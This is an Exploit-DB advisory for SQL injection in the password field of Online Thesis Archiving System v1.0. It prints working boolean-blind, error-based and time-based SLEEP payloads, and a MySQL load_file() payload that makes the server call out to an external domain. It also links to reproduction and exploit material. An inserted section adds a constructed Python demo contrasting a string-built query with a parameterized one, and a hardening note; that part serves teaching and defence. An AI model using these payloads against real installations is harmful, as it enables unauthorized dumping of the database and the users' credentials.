Online Thesis Archiving System v1.0 – Multiple-SQLi

  • Author: nu11secur1ty
    Date: 2023-06-14
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/51521/
## Exploit Title: Online Thesis Archiving System v1.0 - Multiple-SQLi
## Author: nu11secur1ty
## Date: 06.12.2023
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/15083/online-thesis-archiving-system-using-phpoop-free-source-code.html
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The password parameter appears to be vulnerable to SQL injection attacks. The payload `'+(select load_file('\\\\t5z7nwb485tiyvqzqnv3hp1z3q9jxatyk18tvkj9.tupungerispanski.com\\ock'))+'` was submitted in the password parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a host on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. An attacker can dump all information from the database of this system and then use it for dangerous and malicious purposes!

STATUS: HIGH-CRITICAL Vulnerability
    
[+]Payload:
```
---
Parameter: password (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7') OR NOT 1404=1404-- Eotr

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7') AND (SELECT 5476 FROM(SELECT COUNT(*),CONCAT(0x717a6b6b71,(SELECT (ELT(5476=5476,1))),0x71766a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sOUa

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7') AND (SELECT 6301 FROM (SELECT(SLEEP(15)))MFgI)-- HCqY
---
```
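To show what the boolean-based blind payload above actually exploits, here is an added example that is not code from the advisory or from the OTAS project: a constructed login routine in Python over an in-memory SQLite database, once built by string concatenation and once with bound parameters. The query shape `password = md5('...')` is an assumption inferred from the trailing `')` in the published payloads, SQLite stands in for MySQL, and the user rows and the TRUE-branch probe are constructed for the demonstration.

```python
import hashlib
import sqlite3

# Constructed stand-in for the login query; the project's real code is not on
# the page. The trailing ') in the published payloads suggests the password is
# wrapped in a call such as md5('...'), so that shape is assumed here.
VULN_SQL = ("SELECT id, email FROM users WHERE email = '{email}' "
            "AND password = md5('{password}')")
SAFE_SQL = "SELECT id, email FROM users WHERE email = ? AND password = md5(?)"

# Boolean-based blind probe from the advisory (sqlmap's "OR NOT" test, FALSE
# branch) and the TRUE branch it is paired with; "Eotr" is sqlmap's random tail.
EMAIL = "itvBGDRM@burpcollaborator.net"
PROBE_FALSE = "v7K!u1n!T7') OR NOT 1404=1404-- Eotr"
PROBE_TRUE = "v7K!u1n!T7') OR NOT 1404=1405-- Eotr"

def make_db() -> sqlite3.Connection:
    """In-memory SQLite with a constructed users table; md5() is registered
    because SQLite lacks MySQL's built-in one."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("md5", 1,
                         lambda s: hashlib.md5(str(s).encode()).hexdigest())
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, "
                 "email TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (email, password) VALUES (?, md5(?))",
                     [("admin@example.test", "CorrectHorse!"),
                      ("user@example.test", "hunter2")])
    return conn


def login_vulnerable(conn, email, password):
    """String-built query: the submitted text is parsed as SQL."""
    sql = VULN_SQL.format(email=email, password=password)
    return conn.execute(sql).fetchall()


def login_parameterized(conn, email, password):
    """Bound parameters: the same text is only ever compared as a value."""
    return conn.execute(SAFE_SQL, (email, password)).fetchall()


def blind_probe_counts(login):
    """Row counts for the FALSE and TRUE probes; a difference is the blind-SQLi signal."""
    conn = make_db()
    try:
        return (len(login(conn, EMAIL, PROBE_FALSE)),
                len(login(conn, EMAIL, PROBE_TRUE)))
    finally:
        conn.close()
```

The `load_file()` probe quoted in the description additionally needs the MySQL FILE privilege and a permissive `secure_file_priv`; the account the application connects with should have neither, so an injection cannot be turned into file reads or out-of-band callbacks.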
    
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/OTAS-v1.0)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/06/otas-php-by-oretnom23-v10-multiple-sqli.html)

## Time spent:
01:15:00
    
    
-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
    
    